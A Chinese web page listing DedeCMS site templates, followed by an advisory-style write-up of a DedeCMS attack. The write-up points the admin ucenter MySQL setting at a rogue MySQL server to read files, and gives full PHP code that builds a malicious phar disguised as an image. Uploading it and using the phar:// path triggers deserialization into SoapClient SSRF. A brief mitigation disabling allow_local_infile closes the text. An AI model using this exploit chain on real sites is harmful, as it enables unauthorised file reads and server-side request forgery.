- 艺考培训类网站织梦模板...
- 阀门制造设备展示类网站...
- QQ个性空间日志资讯类网...
- 电脑机箱配件类网站织梦...
- 财经新闻资讯类网站织梦...
- 律师事务所网站织梦模板...
- 中国风古典园林假山工程...
- 金融理财投资类网站织梦...
- 甲醛检测空气污染治理类...
- 水性工业漆类企业网站织...
- 微商货源网店代理类网站...
- 生态水果蔬菜商城类网站...
- 苗木草坪种植绿化类网站...
- 五金水槽挂架类网站织梦...
- 服装定制设计类网站织梦...
- PPT素材下载类网站织梦模...
- 宠物兽医门诊医院类网站...
- 新闻博客资讯类网站织梦...
- 五金配件加工机械设备类...
- 餐饮美食类网站织梦模板...
dedecms的后台存在ucenter功能,可以直接修改ucenter的配置,使网站的mysql连接。指向我们预先构造的rogue mysql server https://github.com/Gifts/Rogue-MySql-Server.git
设置之后我们就可以通过修改恶意服务端的设置来读取任意文件。 假如读取的文件路径是以phar协议开头的,那么读取的文件内容就会被反序列化。 根据dedecms的代码,我们可以利用soapclient内置类来构造反序列化pop链来ssrf。
<?phpclass Control{var $tpl;public $dsql;function __construct(){$this->dsql = new SoapClient(null,array('uri'=>'http://test:5555', 'location'=>'http://test:5555/aaa'));}}@unlink("dedecms.phar");$phar = new Phar("dedecms.phar");$phar->startBuffering();$phar->setStub("GIF89a"."<?php __HALT_COMPILER(); ?>");$o = new Control();$phar->setMetadata($o);$phar->addFromString("test.txt", "test");$phar->stopBuffering();?>
将生成的文件修改为dedecms.png,然后在dedecms上有很多地方都可以上传。
上传成功之后可以从文件列表中获取到图片链接。
phar://../uploads/allimg/190724/1_1529564891.png/test.txt
设置完成之后,刷新就可以触发ssrf。
解决方案:
临时解决方案
通过mysqli_options设置链接时禁用allow_local_infile配置可阻止该漏洞。
或在php.ini中改配置为mysqli.allow_local_infile = Off